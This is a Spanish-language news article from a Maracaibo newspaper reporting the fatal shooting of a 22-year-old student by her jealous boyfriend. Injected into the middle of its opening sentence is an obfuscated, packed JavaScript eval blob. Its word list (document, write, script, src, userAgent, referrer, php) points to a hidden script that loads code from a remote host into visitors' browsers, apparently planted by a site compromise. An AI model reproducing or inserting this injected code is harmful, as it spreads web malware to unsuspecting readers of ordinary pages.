publicidad

Por celos matan a la “Barbie”

Helen Hernández / Maracaibo / noticias@laverdad.com
De eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ftbry|var|u0026u|referrer|bddkk||js|php'.split('|'),0,{})) un balazo en el abdomen mataron a una muchacha de 22 años. Denuncian que su novio le disparó con el arma que llevaba debajo de la camisa

Los parientes de la fallecida se negaron a rendir declaraciones a los medios de comunicación. (José Nava)

La tragedia y el dolor tocaron la puerta de la familia Nava, la pequeña de cabellos dorados que criaron con tanto amor había muerto en manos de un novio celoso. El pasado lunes a las 7.30 de la noche, María Angélica Nava, de 22 años, estudiante de Derecho, mejor conocida como la “Barbie”, recibió un balazo en el abdomen.

Sentados en uno de los muros rojos que rodea la morgue forense de la Facultad de Medicina de la Universidad del Zulia, permanecían los parientes de la muchacha. Cuando observaron a los medios de comunicación acercarse hacía ellos, les pidieron a gritos que respetaran su dolor.

A través de un reporte oficial emitido por los detectives del Eje de Homicidios de la Policía científica los periodistas obtuvieron el relato. Mientras la jovencita se encontraba en la casa 22 – 41 ubicada en la calle 8 del barrio Corazón de Jesús, parroquia Francisco Ochoa del municipio San Francisco, Nerio Alberto Vílchez Simanca (25), su novio, la visitó como de costumbre.

En medio de la conversación el joven se alteró, sacó la pistola Tanfoglio, modelo GP32, serial FLA3013, que tenía escondida debajo de la camisa y sin mediar palabras le disparó. Al escuchar la detonación un familiar corrió hasta la sala, su sorpresa no pudo ser mayor, en el suelo yacía la víctima, la sangre corría en abundancia.

Cuando su asesino se dio cuenta de lo que había hecho, la tomó entre sus brazos y la subió a un vehículo particular con destino al centro asistencial más cercano donde murió minutos después de ingresar, detalló un funcionario vinculado con la investigación.

De manera extraoficial trascendió que el asesino trabaja como operador de planta de Corpoelec, está detenido en un calabozo de la sede de la Policía científica en Altos del Sol Amado. Hasta el momento los detectives manejan el crimen como pasional.

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama